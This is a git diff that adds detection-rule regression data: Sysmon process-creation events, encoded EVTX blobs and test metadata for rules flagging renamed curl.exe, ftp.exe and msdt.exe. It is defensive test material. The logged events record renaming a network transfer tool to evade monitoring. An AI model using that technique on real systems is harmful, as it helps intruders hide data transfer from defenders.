zfFhs>C<2OrBA^H;0*Zhlpa>`eihv@Z2q*%IfFhs>C<2OrBA^H;0*Zhlpa>`eihv@Z J2wY|a{s$8S8`J;* literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json new file mode 100644 index 000000000..965a92298 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:30:29.328671Z" + } + }, + "EventRecordID": 256840, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:30:29.319", + "ProcessGuid": "5AB40FD1-3EE5-68F9-3A31-000000003B02", + "ProcessId": 480, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-curl.exe", + "FileVersion": "8.13.0", + "Description": "The curl executable", + "Product": "The curl executable", + "Company": "curl, https://curl.se/", + "OriginalFileName": "curl.exe", + "CommandLine": "renamed-curl.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml new file mode 100644 index 000000000..3c18db285 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_curl/info.yml @@ -0,0 +1,13 @@ +id: a8016fa4-d7e0-40de-85b0-ae04f270eec5 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 7530cd3d-7671-43e3-b209-976966f6ea48 + title: Renamed CURL.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx new file mode 100644 index 0000000000000000000000000000000000000000..d133234a88b750991f81e5c8c032dfe231ffabe5 GIT binary patch literal 69632 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 F{{t8Qv7rC} literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json new file mode 100644 index 000000000..0b1521ea0 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:25:23.218638Z" + } + }, + "EventRecordID": 256757, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:25:23.215", + "ProcessGuid": "5AB40FD1-3DB3-68F9-0A31-000000003B02", + "ProcessId": 5312, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-ftp.exe", + "FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)", + "Description": "File Transfer Program", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "ftp.exe", + "CommandLine": "renamed-ftp.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=02EF5C4F3C041DE47811498C331B6F46,SHA256=B551CF05B43639364EFC71995E19DB620F5EFCE311110D0CF932354C3FE6ED7A,IMPHASH=7B22256667E90FDEA4DBB956FD02584C", + "ParentProcessGuid": "5AB40FD1-8DEB-68F7-7E01-000000003B02", + "ParentProcessId": 476, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml new file mode 100644 index 000000000..dc986bbfb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_ftp/info.yml @@ -0,0 +1,13 @@ +id: 280664b2-b588-40f6-8b65-280523049740 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 277a4393-446c-449a-b0ed-7fdc7795244c + title: Renamed FTP.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx new file mode 100644 index 0000000000000000000000000000000000000000..aff2198c86c78f6fd540e3dde8d7c306636c45cf GIT binary patch literal 69632 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 